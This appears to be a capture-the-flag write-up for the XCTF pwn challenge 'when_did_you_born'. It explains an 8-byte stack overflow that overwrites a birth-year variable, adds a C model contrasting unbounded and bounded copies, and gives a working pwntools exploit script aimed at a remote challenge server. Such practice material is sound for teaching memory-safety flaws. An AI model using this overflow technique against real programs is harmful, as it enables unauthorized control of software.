XCTF - pwn when_did_you_born - WP

1. First, copy the binary into a virtual machine and run it.

2. Checking the file type shows a 64-bit binary. The protection check shows that canary and NX are enabled, but neither matters much for this challenge.

3. Decompile the binary with ida64 and look at the main function. It is easy to see that the flag is printed in the else branch, which is reached when v6 equals 1926.

4. The problem is that the first check requires v6 not to be 1926, while the second check requires v6 to be exactly 1926. Looking at the variable declarations above main, v5 sits at rbp-20h and v6 at rbp-18h, so the two variables are 8 bytes apart. The second input is written into v5 and can run past it into v6, so the exploit uses the second input to overwrite v6 with 1926. The payload is therefore 8 bytes of padding followed by 1926 as a 64-bit value.

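To make the 8-byte offset concrete, here is an added C model of the two stack slots and the two checks. It is constructed for this writeup and is not the challenge's own source (which the page does not show): the name buffer is placed at offset 0 and the birth year at offset 8 of a 16-byte block, mirroring v5 at rbp-20h and v6 at rbp-18h, and all function names are assumptions. The same padding + 1926 layout as the writeup's payload is pushed through an unbounded copy, which is what lets the name overwrite the year, and through a length-limited copy, which is the fix.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the challenge's stack frame (not the binary's code):
 * v5 (name) at rbp-0x20 and v6 (birth year) at rbp-0x18 are 8 bytes apart,
 * so we model them as a flat 16-byte block: name at 0, birth at 8. */
#define NAME_OFF  0
#define NAME_LEN  8
#define BIRTH_OFF 8
#define FRAME_LEN 16

typedef struct { unsigned char bytes[FRAME_LEN]; } frame_t;

/* Store the year as a 64-bit little-endian integer at offset 8, the way a
 * long is laid out on x86-64. */
void set_birth(frame_t *f, uint64_t year) {
    for (int i = 0; i < 8; i++)
        f->bytes[BIRTH_OFF + i] = (unsigned char)(year >> (8 * i));
}

uint64_t get_birth(const frame_t *f) {
    uint64_t y = 0;
    for (int i = 7; i >= 0; i--)
        y = (y << 8) | f->bytes[BIRTH_OFF + i];
    return y;
}

/* Unbounded copy: mirrors an unchecked read into v5. Anything beyond
 * 8 bytes lands on v6. (Clamped to the model so the model itself stays
 * in bounds.) */
void read_name_unbounded(frame_t *f, const unsigned char *in, size_t n) {
    if (n > FRAME_LEN) n = FRAME_LEN;
    memcpy(f->bytes + NAME_OFF, in, n);
}

/* Bounded copy: the fix. Never write more than the buffer holds. */
void read_name_bounded(frame_t *f, const unsigned char *in, size_t n) {
    if (n > NAME_LEN) n = NAME_LEN;
    memcpy(f->bytes + NAME_OFF, in, n);
}

/* Same check order as the decompiled main: the first check (right after
 * "Birth?") must see a year other than 1926, the second (after "Name?")
 * must see 1926. Returns 1 if the flag branch is reached. */
int run_checks(const frame_t *after_birth, const frame_t *after_name) {
    if (get_birth(after_birth) == 1926) return 0;
    return get_birth(after_name) == 1926;
}

/* Run the whole scenario with the given name-reading routine. */
int scenario(void (*read_name)(frame_t *, const unsigned char *, size_t)) {
    frame_t f;
    memset(&f, 0, sizeof f);
    set_birth(&f, 2000);                 /* "Birth?" -> 2000 */
    frame_t before = f;
    /* Constructed 16-byte name: 8 bytes of padding, then 1926 (0x786)
     * little-endian, the same layout as the writeup's payload. */
    unsigned char name[16] = { 'a','a','a','a','a','a','a','a',
                               0x86,0x07,0,0,0,0,0,0 };
    read_name(&f, name, sizeof name);    /* "Name?" */
    return run_checks(&before, &f);
}

int main(void) {
    printf("unbounded read: flag branch reached = %d\n", scenario(read_name_unbounded));
    printf("bounded read:   flag branch reached = %d\n", scenario(read_name_bounded));
    return 0;
}
```

With the unbounded copy the second check sees 1926 and the flag branch is reached; with the bounded copy the year stays 2000 and it is not. The lesson for the program's author is that the name read must be limited to the buffer's size, exactly what the bounded variant does.
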
5. Exploit script (pwntools; the payload is kept as bytes so it works on both Python 2 and 3):

#!/usr/bin/env python
from pwn import *

# v5 (name buffer) at rbp-20h
# v6 (birth year)  at rbp-18h, 8 bytes above v5
# goal: v6 == 1926 at the second check

# 8 bytes of padding fill v5, then 1926 as a 64-bit little-endian
# integer lands on v6. Keep everything as bytes: str(p64(...)) would
# give "b'...'" on Python 3 and break the payload.
payload = b'a' * 8 + p64(1926)

r = remote("111.198.29.45", 57262)
r.recvuntil(b"Birth?")
r.sendline(b"2000")      # first check: must not be 1926
r.recvuntil(b"Name?")
r.sendline(payload)      # overflow overwrites v6 with 1926

r.interactive()

6. Running the script prints the flag.

Origin www.cnblogs.com/Tsuiyields/p/11515377.html